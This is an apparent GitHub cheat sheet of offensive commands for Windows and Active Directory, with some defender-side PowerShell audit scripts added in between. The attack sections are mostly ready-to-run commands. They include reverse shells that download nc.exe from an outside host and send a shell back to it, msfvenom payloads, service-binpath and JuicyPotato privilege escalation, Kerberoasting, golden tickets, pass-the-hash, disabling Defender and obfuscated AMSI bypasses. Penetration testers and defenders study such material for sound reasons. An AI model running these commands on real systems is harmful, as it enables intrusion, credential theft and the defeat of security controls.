Evalle777/Windows-AD-attacking

Windows-AD-attacking

 

Any useful commands for Windows / Active Directory will be posted here 🛡️🔨

 

 

Shells

 

🪝 Creating your reverse/bind shells

 

[+] Create reverse shell using msfvenom

// Meterpreter

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.126 LPORT=443 -f exe > reverse.exe

// TCP

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.119.126 LPORT=443 -f exe > reverse.exe

 

[+] Reverse shell using NetCat

// In your Kali Linux machine:

nc -lnvp 443

// In the target's machine

nc.exe 192.168.13.37 443 -e cmd.exe

 

[+] Log in as a specific user and get a shell using Netcat (Powershell)

$user = "hitman.corp\hitmanalharbi"
$pass = ConvertTo-SecureString -String "PASS123@!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList $user, $pass
Invoke-Command -ComputerName hitman-dc -Credential $cred -ScriptBlock {
	Invoke-WebRequest http://192.168.40.2/nc64.exe -OutFile C:\users\public\nc.exe;
	C:\users\public\nc.exe 192.168.40.2 443 -e cmd.exe
}

   

Transfer files

 

📂 Transferring and sharing files over the network

 

[+] Upload file using Powershell

powershell.exe $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest http://192.168.50.48/ASREPRoast.ps1 -OutFile C:\users\hitman\ASREPRoast.ps1

 

[+] Upload file using certutil.exe

certutil.exe -urlcache -f http://192.168.50.48/Rubeus.exe C:\users\hitman\Rubeus.exe

 

[+] Transfer files using a PowerShell session (PSSession)

$sess = New-PSSession -ComputerName ufc-webprod -Credential usfun\pastudent1337
Copy-Item -Path Invoke-Mimikatz.ps1 -Destination C:\users\public\Invoke-Mimikatz.ps1 -ToSession $sess
// You can use -FromSession to get files from session :D

 

[+] Transfer files using rdesktop tool (Available in Kali Linux)

// In Kali linux

mkdir /home/hitman/shared
rdesktop -f 192.168.50.48 -r disk:linux=/home/hitman/shared

// Now, inside the Windows RDP session

Go to Network Places -> Entire Network -> Microsoft Terminal Services -> tsclient
and put your files there, you will find them in Kali too
Note: You can access the share \\tsclient directly too

 

[+] Transfer files using network shares (Powershell)

// You need to make a public share in your student's VM or your Kali

Copy-Item -Path \\PA-USER1337\scripts\nc64.exe -Destination 'C:\Users\jumpsrvadmin\Desktop\Diagnostics\nc.exe'

   

Privilege escalation

 

🧪 Escalating your privilege to the highest privileges

 

[+] Privilege escalation using JuicyPotato when you have the SeImpersonatePrivilege privilege (sometimes you need to pass a CLSID with -c)

JuicyPotato.exe -l 13373 -p c:\windows\system32\cmd.exe -a "/c c:/users/public/reverse.exe" -t *

 

[+] PowerUp.ps1 "Good powershell script for windows privilege escalation"

C:> powershell.exe -nop -exec bypass

PS C:\> Import-Module PowerUp.ps1

PS C:\> Invoke-AllChecks | Out-File -Encoding ASCII checks.txt

 

[+] Weak service permissions privilege escalation

// For example "Victim" is your current username

C:\Users\victim\Desktop>accesschk64 -uwcqv "victim" *

Accesschk v6.14 - Reports effective permissions for securable objects
Copyright © 2006-2021 Mark Russinovich
Sysinternals - www.sysinternals.com

RW SNMPTRAP
        SERVICE_ALL_ACCESS

// Check service

C:\Users\victim\Desktop>sc qc SNMPTRAP

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SNMPTRAP
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\System32\snmptrap.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SNMP Trap
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

// Change the binary path to your reverse shell or command

C:\Users\victim\Desktop>sc config SNMPTRAP binpath= "net localgroup administrators victim /add"
[SC] ChangeServiceConfig SUCCESS

C:\Users\victim\Desktop>sc config SNMPTRAP obj= ".\LocalSystem" password= ""

[SC] ChangeServiceConfig SUCCESS

// Start the service (stop it first if it is already running) so the new binary path gets executed

C:\Users\victim\Desktop>sc start SNMPTRAP

 

[+] Search for unquoted service paths

// For exploitation check this article: https://www.ired.team/offensive-security/privilege-escalation/unquoted-service-paths

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
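Added example, not from this repo: the defender-side version of the two checks above (weak service DACLs and unquoted service paths) as a PowerShell audit script. It assumes Windows PowerShell 5.1, local administrator rights on the host, and that the trusted-SID list matches your build; the function names are mine.

```powershell
# Added example (not part of the original repo): audit this host for the two
# service misconfigurations the commands above look for.

$SERVICE_CHANGE_CONFIG = 0x00000002
$WRITE_DAC             = 0x00040000
$WRITE_OWNER           = 0x00080000
$GENERIC_ALL           = 0x10000000
$GENERIC_WRITE         = 0x40000000
$WriteMask = $SERVICE_CHANGE_CONFIG -bor $WRITE_DAC -bor $WRITE_OWNER -bor $GENERIC_ALL -bor $GENERIC_WRITE

# Principals that legitimately hold write rights on services (assumption: extend for your build)
$TrustedSids = @(
    'S-1-5-18',                                                       # NT AUTHORITY\SYSTEM
    'S-1-5-32-544',                                                   # BUILTIN\Administrators
    'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'  # NT SERVICE\TrustedInstaller
)

function Get-WeakServiceDacl {
    # Reports ACEs that let a non-trusted principal reconfigure a service.
    # This is the condition accesschk prints as "RW <name> SERVICE_ALL_ACCESS".
    foreach ($name in (Get-Service | Select-Object -ExpandProperty Name)) {
        $sddl = (& sc.exe sdshow $name 2>$null | Where-Object { $_ -match 'D:\(' }) -join ''
        if (-not $sddl) { continue }
        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $sddl.Trim()
        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
            if (($ace.AccessMask -band $WriteMask) -eq 0) { continue }
            if ($TrustedSids -contains $ace.SecurityIdentifier.Value) { continue }
            try   { $who = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value }
            catch { $who = $ace.SecurityIdentifier.Value }
            [pscustomobject]@{
                Service   = $name
                Principal = $who
                Mask      = '0x{0:X8}' -f $ace.AccessMask
            }
        }
    }
}

function Get-UnquotedServicePath {
    # Reports auto-start services whose binary path contains a space but is not
    # quoted, skipping the protected C:\Windows tree (same filter as the wmic line).
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = $svc.PathName
        if ($svc.StartMode -ne 'Auto' -or -not $path) { continue }
        if ($path.StartsWith('"') -or $path -notmatch '\.exe') { continue }
        $exe = ($path -split '\.exe')[0] + '.exe'
        if ($exe -match '\s' -and $exe -notmatch '^[A-Za-z]:\\Windows\\') {
            [pscustomobject]@{ Service = $svc.Name; StartMode = $svc.StartMode; PathName = $path }
        }
    }
}

Get-WeakServiceDacl     | Format-Table -AutoSize
Get-UnquotedServicePath | Format-Table -AutoSize
```

Every row from Get-WeakServiceDacl is a service that the listed principal can point at a different binary with sc config, exactly as the SNMPTRAP walk-through above does; fixing it means removing SERVICE_CHANGE_CONFIG, WRITE_DAC and WRITE_OWNER from that principal's ACE. Unquoted paths are fixed by quoting the path in the service's configuration.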

   

Kerberos

 

🏷️ Kerberos attacks such as extracting tickets, cracking them, or passing them

 

[+] Request a ticket for a specific SPN (powershell)

Add-Type -AssemblyName System.IdentityModel  
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLService/ufc-db1.us.funcorp.local"  

 

[+] Export all tickets using Mimikatz

mimikatz # kerberos::list /export  

 

[+] Crack a ticket using tgsrepcrack.py (you can use John or hashcat too)

./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.hitmanalharbi.local~1433-boo.LOCAL.kirbi  

 

[+] Export all kerberoastable users' hashes in John format (Need PowerView.ps1)

Invoke-Kerberoast -OutputFormat john | Select-Object -ExpandProperty hash |% {$_.replace(':',':$krb5tgs$23$')}
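Added example, not from this repo: the defender's view of the Kerberoast items above. It lists the accounts a Kerberoast would return (user accounts with an SPN) with the ActiveDirectory module and flags the ones that are cheap to crack, i.e. RC4 still allowed or a password that has not been rotated. The 365-day threshold and the function name are my assumptions.

```powershell
# Added example (not part of the original repo). Needs the ActiveDirectory module.
Import-Module ActiveDirectory

function Get-KerberoastableAccount {
    param([int]$MaxPasswordAgeDays = 365)

    $cutoff = (Get-Date).AddDays(-$MaxPasswordAgeDays)
    $props  = 'ServicePrincipalName', 'PasswordLastSet', 'msDS-SupportedEncryptionTypes', 'adminCount', 'Enabled'

    # krbtgt carries SPNs too but is not what a Kerberoast targets, so it is skipped
    Get-ADUser -Filter { ServicePrincipalName -like '*' -and SamAccountName -ne 'krbtgt' } -Properties $props |
        ForEach-Object {
            # Bit 0x4 of msDS-SupportedEncryptionTypes = RC4-HMAC. An unset value means the
            # domain default applies, which on most domains still allows RC4 service tickets.
            $enc = $_.'msDS-SupportedEncryptionTypes'
            $rc4Allowed = (-not $enc) -or (($enc -band 0x4) -ne 0)
            [pscustomobject]@{
                SamAccountName  = $_.SamAccountName
                Enabled         = $_.Enabled
                Privileged      = ($_.adminCount -eq 1)
                RC4Allowed      = $rc4Allowed
                PasswordLastSet = $_.PasswordLastSet
                OldPassword     = ($_.PasswordLastSet -lt $cutoff)
                SPNs            = ($_.ServicePrincipalName -join '; ')
            }
        }
}

# Highest risk first: privileged, RC4-crackable, stale password
Get-KerberoastableAccount |
    Sort-Object -Property Privileged, RC4Allowed, OldPassword -Descending |
    Format-Table -AutoSize
```

The mitigation for each row is the same: a long random password (or a group Managed Service Account, which rotates it for you), AES-only encryption types on the account, and no SPN on a privileged user at all.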

 

[+] Kerberos Double-Hop problem (powershell)

$SecPassword = ConvertTo-SecureString 'YourSecretPassword1337' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('us.funcorp.local\pastudent1337', $SecPassword)
Invoke-Command -ComputerName UFC-JUMPSRV -Credential $cred -ScriptBlock {
    Invoke-Command -ComputerName UFC-WEBPROD -Credential $Using:cred -ScriptBlock {
		& cmd /c "hostname"    
    }
} 

 

[+] Create a golden ticket using Mimikatz

kerberos::golden /user:Hitman /domain:DOMAIN /sid:DOMAIN-SID /krbtgt:HASH /ticket:tgt /ptt

 

[+] Extract SPN/NTLM from keytab file (Linux)

// https://github.com/sosdave/KeyTabExtract

└─# python3 keytabextract.py sql.keytab      
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[!] Unable to identify any AES256-CTS-HMAC-SHA1 hashes.
[!] Unable to identify any AES128-CTS-HMAC-SHA1 hashes.
[+] Keytab File successfully imported.
        REALM : it.gcb.local
        SERVICE PRINCIPAL : sqlsvc/
        NTLM HASH : 7782dXXXXXXXXXXXXXXXXXXX :D

 

[+] Kerberos Resource-based Constrained Delegation (Need PowerMad and AD modules)

New-MachineAccount -Domain internal.msp.local -DomainController internal-dc01.internal.msp.local -MachineAccount attacker -Password (ConvertTo-SecureString 'Password123' -AsPlainText -Force) -Verbose
Set-ADComputer INTERNAL-BATCH -PrincipalsAllowedToDelegateToAccount attacker$ -Verbose
.\Rubeus.exe s4u /user:attacker$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /msdsspn:http/INTERNAL-BATCH /impersonateuser:Administrator /ptt

 

[+] DA to EA via SID history: a golden ticket with the forest root's Enterprise Admins SID (RID 519) in /sids (Mimikatz kerberos::golden syntax; Rubeus has an equivalent golden command)

kerberos::golden /domain:internal.msp.local /user:administrator /sid:S-1-5-21-2754435719-1041067879-922430489 /krbtgt:c5915aaXXXXXXXXX /sids:S-1-5-21-2998733414-582960673-4099777928-519 /ptt

   

Pass the hash

 

🕹️ Passing the hash for different services

 

[+] Pass the hash using pth-winexe (Available in Kali Linux)

pth-winexe -U USER%aad3b435b51404eeaad3b435b51404ee:USER_NTLM_HERE //IP cmd

 

[+] Access RDP using pass the hash (xfreerdp tool)

xfreerdp /u:username /pth:USER_NTLM_HERE /d:domain /v:IP

 

[+] Pass the hash using PsExec.py

python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:USER_NTLM_HERE anyuser@192.168.50.49

 

[+] Pass the hash using Mimikatz and run PowerShell

sekurlsa::pth /user:hitman /ntlm:4d8aa380635ded528e2cc8b0b96f3b06 /domain:hitman.corp /run:powershell.exe

   

Enumeration

 

🔍 Some commands about enumeration and recon

 

[+] Get information about the current domain (Need PowerView.ps1)

Get-NetDomain

 

[+] Get all users in the domain (Need PowerView.ps1)

Get-NetUser | select samaccountname

 

[+] Get all computers in the domain (Need PowerView.ps1)

Get-NetComputer | select samaccountname, operatingsystem

 

[+] Get current domain's information (Active directory module)

Get-ADDomain

 

[+] Get current domain's users (Active directory module)

Get-ADUser -Filter * | Select SamAccountName

 

[+] Get current domain's computers (Active directory module)

Get-AdComputer -Filter * | select Name

 

[+] Get current domain's groups (Active directory module)

Get-ADGroup -Filter * | select name

 

[+] Get specific group's members (Active directory module)

Get-ADGroupMember -Identity "Administrators" -Recursive

 

[+] Get users & computers with specific properties, my favorite way to enumerate :D (Active directory module)

// Get users and some properties like passwordlastset to know when it changed and the description

Get-ADUser -filter * -properties passwordlastset,description | ft Name, passwordlastset, Description

// Same for computers

Get-ADComputer -filter * -properties passwordlastset,description | ft Name, passwordlastset, Description

 

[+] Search for local admin access (Need PowerView.ps1)

// Get all computers from specific domain

$computers = Get-NetComputer -Domain hitman.msp.local

// Use Invoke-Command to check if you can execute command on them

Invoke-Command -ErrorAction SilentlyContinue -ScriptBlock{ hostname } -Computer ($computers.dnshostName)

 

[+] Enumerate SMB shares using smbclient (smbclient is available in Kali Linux)

smbclient -L IP

 

[+] Sharphound command (For bloodhound)

// EXE version

./SharpHound.exe --CollectionMethod All

// Powershell version

Invoke-BloodHound -CollectionMethod All

 

[+] Find interesting ACLs for specific user (Need PowerView.ps1)

Invoke-ACLScanner -ResolveGUID | ? {$_.IdentityReferenceName -like "*jumpsrv*"}

 

[+] Find all ACLs for specific computer/group/user's SID (Need PowerView.ps1)

Get-ObjectAcl -ResolveGUIDs -Domain internal.msp.local | ? {$_.SecurityIdentifier -like "S-1-5-21-2754435719-1041067879-922430489-1118"}

 

[+] Discover domain computers that have unconstrained delegation (Need PowerView.ps1)

Get-DomainComputer -UnConstrained | select samaccountname

 

[+] Enumerate users/computers that have constrained delegation enabled (Need PowerView.ps1)

// Users

Get-DomainUser -TrustedToAuth | select samaccountname, msds-allowedtodelegateto

// Computers

Get-Domaincomputer -TrustedToAuth | select samaccountname, msds-allowedtodelegateto
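Added example, not from this repo: one defender-side delegation audit with the ActiveDirectory module. It covers what the two PowerView queries above enumerate (unconstrained and constrained delegation) plus resource-based constrained delegation and the ms-DS-MachineAccountQuota that the RBCD chain in the Kerberos section depends on. The function names are mine.

```powershell
# Added example (not part of the original repo). Needs the ActiveDirectory module.
Import-Module ActiveDirectory

function Get-DelegationAudit {
    # Unconstrained: the account caches every caller's TGT. Domain controllers are
    # expected here; any other account is a finding.
    $dcNames = (Get-ADDomainController -Filter *).Name
    Get-ADComputer -Filter { TrustedForDelegation -eq $true } |
        Where-Object { $_.Name -notin $dcNames } |
        ForEach-Object { [pscustomobject]@{ Kind = 'Unconstrained'; Account = $_.SamAccountName; Detail = '' } }
    Get-ADUser -Filter { TrustedForDelegation -eq $true } |
        ForEach-Object { [pscustomobject]@{ Kind = 'Unconstrained'; Account = $_.SamAccountName; Detail = '' } }

    # Constrained: any object with an msDS-AllowedToDelegateTo list. userAccountControl
    # bit 0x1000000 (TRUSTED_TO_AUTH_FOR_DELEGATION) is protocol transition, which lets
    # the account impersonate users without ever seeing their ticket.
    Get-ADObject -Filter { msDS-AllowedToDelegateTo -like '*' } -Properties 'msDS-AllowedToDelegateTo', 'userAccountControl' |
        ForEach-Object {
            $kind = if (($_.userAccountControl -band 0x1000000) -ne 0) { 'Constrained+ProtocolTransition' } else { 'Constrained' }
            [pscustomobject]@{ Kind = $kind; Account = $_.Name; Detail = ($_.'msDS-AllowedToDelegateTo' -join '; ') }
        }

    # Resource-based: configured on the target, so list who may delegate TO each computer
    # (this is the attribute Set-ADComputer -PrincipalsAllowedToDelegateToAccount writes).
    Get-ADComputer -Filter * -Properties PrincipalsAllowedToDelegateToAccount |
        Where-Object { $_.PrincipalsAllowedToDelegateToAccount } |
        ForEach-Object {
            [pscustomobject]@{
                Kind    = 'ResourceBased'
                Account = $_.SamAccountName
                Detail  = ($_.PrincipalsAllowedToDelegateToAccount -join '; ')
            }
        }
}

function Get-MachineAccountQuota {
    # A non-zero quota lets any domain user create computer accounts, which is
    # what New-MachineAccount relies on above. 0 is the recommended value.
    $dn = (Get-ADDomain).DistinguishedName
    (Get-ADObject -Identity $dn -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
}

Get-DelegationAudit | Sort-Object Kind | Format-Table -AutoSize
"ms-DS-MachineAccountQuota = $(Get-MachineAccountQuota)"
```

Accounts that must not be delegated at all (Domain Admins and the like) belong in the Protected Users group or get the "Account is sensitive and cannot be delegated" flag; neither shows up in this listing, so check both separately.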

 

[+] Get specific domain SID (Need PowerView.ps1)

Get-DomainSID -Domain funcorp.local

 

[+] Find interesting ACLs in another domain (Need PowerView.ps1)

Find-InterestingDomainAcl -Domain TrustedForest.corp

 

[+] Get AppLocker rules/policies (Powershell)

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

 

[+] Display a service's security descriptor (CMD)

// scmanager is the service's name, you can write any service 

sc sdshow scmanager

 

[+] Get the capabilities of a specific user on a constrained session configuration (JEA)

Get-PSSessionCapability -ConfigurationName ITAccess -Username vanessa

   

MSSQL

 

📇 Some commands that will help you when pentesting MSSQL

 

[+] Get list of sql servers on the domain (PowerUpSQL)

Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose 

 

[+] Execute a custom query (PowerUpSQL)

Get-SQLQuery -Instance AC-DBREPORT -Query "SELECT current_user"

 

[+] Execute a query to get the databases names (PowerUpSQL)

Get-SQLQuery -Instance msp-sqlreport -Query "SELECT name FROM master..sysdatabases;"

 

[+] Execute a query to get the tables from specific database (PowerUpSQL)

Get-SQLQuery -Instance msp-sqlreport -Query "SELECT name FROM DatabaseNameYouWant..sysobjects WHERE xtype = 'U';"

 

[+] Execute a query to get the linked servers (PowerUpSQL)

Get-SQLQuery -Instance msp-sqlreport -Query "exec sp_linkedservers;"

 

[+] Escalate the privileges (PowerUpSQL)

Invoke-SQLEscalatePriv -Verbose -Instance DBSERVER

 

[+] Crawl database links (PowerUpSQL)

Get-SqlServerLinkCrawl -Verbose -Instance UFC-SQLDEV

 

[+] Crawl database links and execute a custom query (PowerUpSQL)

 Get-SqlServerLinkCrawl -Verbose -Instance UFC-SQLDEV -Query "select current_user" 

 

[+] Enable XP_CMDSHELL (Any MSSQL client like HeidiSQL)

EXEC sp_configure 'show advanced options',1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE
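Added example, not from this repo: a defender's audit of the things this section goes after on an MSSQL instance, using System.Data.SqlClient from PowerShell rather than PowerUpSQL. It reports dangerous server options that are switched on (xp_cmdshell among them), linked servers with the login they use, and the members of sysadmin. It assumes the caller's Windows account can connect to the instance; the function names are mine.

```powershell
# Added example (not part of the original repo).

function Invoke-SqlAuditQuery {
    # Run one query on an open connection and return its rows
    param([System.Data.SqlClient.SqlConnection]$Connection, [string]$Sql)
    $cmd = $Connection.CreateCommand()
    $cmd.CommandText = $Sql
    $table = New-Object System.Data.DataTable
    $table.Load($cmd.ExecuteReader())
    $table.Rows
}

function Get-SqlServerAudit {
    param([Parameter(Mandatory)][string]$Instance)
    $cs   = "Server=$Instance;Integrated Security=True;Encrypt=True;TrustServerCertificate=True"
    $conn = New-Object System.Data.SqlClient.SqlConnection -ArgumentList $cs
    $conn.Open()
    try {
        # Options that turn SQL access into code execution or outbound data access
        $risky = Invoke-SqlAuditQuery $conn @"
SELECT name FROM sys.configurations
WHERE name IN ('xp_cmdshell','Ole Automation Procedures','clr enabled','Ad Hoc Distributed Queries')
  AND CAST(value_in_use AS int) = 1
"@
        # Linked servers: a link that maps every caller to a fixed remote login
        # (remote_name set) is the hop a link crawl follows
        $links = Invoke-SqlAuditQuery $conn @"
SELECT s.name, s.data_source, l.remote_name, l.uses_self_credential
FROM sys.servers s LEFT JOIN sys.linked_logins l ON s.server_id = l.server_id
WHERE s.is_linked = 1
"@
        $admins = Invoke-SqlAuditQuery $conn "SELECT name FROM sys.server_principals WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1"

        [pscustomobject]@{
            Instance      = $Instance
            RiskyOptions  = @($risky  | ForEach-Object { $_.name })
            LinkedServers = @($links  | ForEach-Object {
                $login = if ($_.uses_self_credential) { 'caller (self)' } else { "$($_.remote_name)" }
                "$($_.name) -> $($_.data_source) as $login" })
            Sysadmins     = @($admins | ForEach-Object { $_.name })
        }
    }
    finally { $conn.Close() }
}

Get-SqlServerAudit -Instance 'msp-sqlreport' | Format-List
```

A non-empty RiskyOptions list is the thing to fix first (sp_configure 'xp_cmdshell', 0 and RECONFIGURE, the reverse of the block above); for links, prefer "self" mappings or a least-privileged remote login over a fixed sysadmin one.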

   

LAPS

 

🔑 Local Administrator Password Solution (LAPS) commands; install the LAPS module from https://github.com/ztrhgf/LAPS

 

[+] Identify whether LAPS is installed on the current computer (Powershell)

Get-ChildItem 'c:\program files\LAPS\CSE\Admpwd.dll'

 

[+] Get domain computers that have LAPS (Need AD module)

Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'}

 

[+] Enumerate OUs where LAPS is in use and which groups/users can read the passwords (Need LAPS module)

PS C:\Users\itemployee14\Desktop\PS modules> Import-Module .\AdmPwd.PS\AdmPwd.PS.psd1
PS C:\Users\itemployee14\Desktop\PS modules> Find-AdmPwdExtendedRights -Identity *

Name                 DistinguishedName                                                 Status
----                 -----------------                                                 ------
Domain Controllers   OU=Domain Controllers,DC=gcb,DC=local                             Delegated
Domain Controllers   OU=Domain Controllers,DC=it,DC=gcb,DC=local                       Delegated
AppServers           OU=AppServers,DC=it,DC=gcb,DC=local                               Delegated
ITEmployees          OU=ITEmployees,DC=it,DC=gcb,DC=local                              Delegated
PreProd              OU=PreProd,DC=it,DC=gcb,DC=local                                  Delegated

PS C:\Users\itemployee14\Desktop\PS modules> Find-AdmPwdExtendedRights -Identity AppServers

ObjectDN                                      ExtendedRightHolders
--------                                      --------------------
OU=AppServers,DC=it,DC=gcb,DC=local           {NT AUTHORITY\SYSTEM, IT\Domain Admins, IT\LocalAdmins}

 

[+] Get all domain computers and check LAPS for their passwords (Need AD & LAPS modules)

PS C:\Users\itemployee14\Desktop\PS modules> get-adcomputer -filter * | get-admpwdpassword

ComputerName         DistinguishedName                             Password           ExpirationTimestamp
------------         -----------------                             --------           -------------------
IT-DC                CN=IT-DC,OU=Domain Controllers,DC=it,DC=gc...                    1/1/0001 12:00:00 AM
IT-PREPROD           CN=IT-PREPROD,OU=PreProd,DC=it,DC=gcb,DC=l...                    1/1/0001 12:00:00 AM
IT-SQLSRV02          CN=IT-SQLSRV02,CN=Computers,DC=it,DC=gcb,D...                    1/1/0001 12:00:00 AM
IT-APPSRV01          CN=IT-APPSRV01,OU=AppServers,DC=it,DC=gcb,...                    6/27/2019 5:45:32 AM
IT-TRACK01           CN=IT-TRACK01,CN=Computers,DC=it,DC=gcb,DC...                    1/1/0001 12:00:00 AM

 

[+] Get password from LAPS for a specific machine (Need AD module)

 Get-ADComputer -Identity it-appsrv01 -Properties ms-mcs-admpwd | select -ExpandProperty ms-mcs-admpwd
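Added example, not from this repo: the two LAPS checks a defender runs with only the ActiveDirectory module. Get-LapsCoverage decodes ms-Mcs-AdmPwdExpirationTime (a Windows FILETIME, which is why the table above shows 1/1/0001 for machines that never got a password) and flags machines without LAPS or with an expired password; Get-LapsReader reads an OU's ACL for principals holding the ms-Mcs-AdmPwd right, which is what Find-AdmPwdExtendedRights reports. Function names are mine; the OU in the usage line is a placeholder.

```powershell
# Added example (not part of the original repo). Needs the ActiveDirectory module.
Import-Module ActiveDirectory

function Get-LapsCoverage {
    Get-ADComputer -Filter * -Properties 'ms-Mcs-AdmPwdExpirationTime' |
        ForEach-Object {
            $raw     = $_.'ms-Mcs-AdmPwdExpirationTime'
            $expires = if ($raw) { [DateTime]::FromFileTimeUtc([int64]$raw) } else { $null }
            $state   = if (-not $raw) { 'NoLAPS' }
                       elseif ($expires -lt (Get-Date).ToUniversalTime()) { 'Expired' }
                       else { 'OK' }
            [pscustomobject]@{ Computer = $_.Name; ExpiresUtc = $expires; State = $state }
        }
}

function Get-LapsReader {
    param([Parameter(Mandatory)][string]$OU)   # distinguished name of the OU
    # Look up the schema GUID of ms-Mcs-AdmPwd so object-specific ACEs can be matched
    $schemaNc = (Get-ADRootDSE).schemaNamingContext
    $attr     = Get-ADObject -SearchBase $schemaNc -Filter { lDAPDisplayName -eq 'ms-Mcs-AdmPwd' } -Properties schemaIDGUID
    $guid     = [guid]$attr.schemaIDGUID

    (Get-Acl -Path "AD:\$OU").Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and (
                # right scoped to the password attribute itself
                ($_.ObjectType -eq $guid -and $_.ActiveDirectoryRights -match 'ExtendedRight|ReadProperty|GenericAll') -or
                # blanket rights on the OU also cover the attribute
                ($_.ObjectType -eq [guid]::Empty -and $_.ActiveDirectoryRights -match 'ExtendedRight|GenericAll')
            )
        } |
        Select-Object IdentityReference, ActiveDirectoryRights, IsInherited -Unique
}

Get-LapsCoverage | Where-Object State -ne 'OK' | Format-Table -AutoSize
Get-LapsReader -OU 'OU=AppServers,DC=it,DC=gcb,DC=local' | Format-Table -AutoSize   # placeholder OU
```

The readers list is where the "Delegated" rows above come from: anything in it beyond SYSTEM, Domain Admins and the group you deliberately delegated is a path to every local administrator password under that OU.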

   

Security and policies

 

🔓 Bypass security, policies and AV evasion

 

[+] Bypass Powershell Execution Policy

// In Powershell you can write:

Set-ExecutionPolicy -ExecutionPolicy bypass

// or run powershell like this:

powershell.exe -ep bypass

 

[+] Disable windows defender

// Registry 

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1

// Powershell

powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true

 

[+] Powershell AMSI bypass

// Try this

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

// Or you can try this

[ReF]."`A$(echo sse)`mB$(echo L)`Y"."g`E$(echo tty)p`E"(( "Sy{3}ana{1}ut{4}ti{2}{0}ils" -f'iUt','gement.A',"on.Am`s",'stem.M','oma') )."$(echo ge)`Tf`i$(echo El)D"(("{0}{2}ni{1}iled" -f'am','tFa',"`siI"),("{2}ubl{0}`,{1}{0}" -f 'ic','Stat','NonP'))."$(echo Se)t`Va$(echo LUE)"($(),$(1 -eq 1))

 

[+] Bypass "Dot sourcing is not allowed" in PowerShell

// Write the call/code in a file

'Import-Module C:\allowedPath\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command "privilege::debug token::elevate" ' | Out-File -FilePath run.ps1

// Run file directly without dot source

.\run.ps1
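Added example, not from this repo: a defender's check that the controls bypassed in this section are still in place on a host, plus a look at the Defender operational log for the moments real-time protection was switched off. Registry paths and event IDs are the standard ones; the 7-day window and the function names are my assumptions.

```powershell
# Added example (not part of the original repo). Needs the Defender module
# (Get-MpPreference / Get-MpComputerStatus) and local administrator rights.

function Get-DefenderState {
    $pref   = Get-MpPreference
    $status = Get-MpComputerStatus
    # The policy key is the one the "reg add" above writes; the preference is what
    # Set-MpPreference -DisableRealtimeMonitoring writes.
    $policy = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -ErrorAction SilentlyContinue
    $sbl    = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' -ErrorAction SilentlyContinue
    [pscustomobject]@{
        RealTimeProtectionEnabled = $status.RealTimeProtectionEnabled
        AntivirusEnabled          = $status.AntivirusEnabled
        TamperProtection          = $status.IsTamperProtected
        PrefDisableRealtime       = $pref.DisableRealtimeMonitoring
        PolicyDisableRealtime     = [bool]$policy.DisableRealtimeMonitoring
        ScriptScanningEnabled     = -not $pref.DisableScriptScanning
        ScriptBlockLogging        = ($sbl.EnableScriptBlockLogging -eq 1)   # 4104 events catch AMSI-bypass one-liners
        ExecutionPolicy           = (Get-ExecutionPolicy -List | ForEach-Object { "$($_.Scope)=$($_.ExecutionPolicy)" }) -join ' '
    }
}

function Get-DefenderDisableEvent {
    # 5001 = real-time protection disabled, 5010 = malware scanning disabled,
    # 5004 = real-time protection configuration changed
    param([int]$Days = 7)
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5001, 5004, 5010
        StartTime = (Get-Date).AddDays(-$Days)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, @{ n = 'Summary'; e = { ($_.Message -split "`n")[0] } }
}

Get-DefenderState | Format-List
Get-DefenderDisableEvent | Format-Table -AutoSize
```

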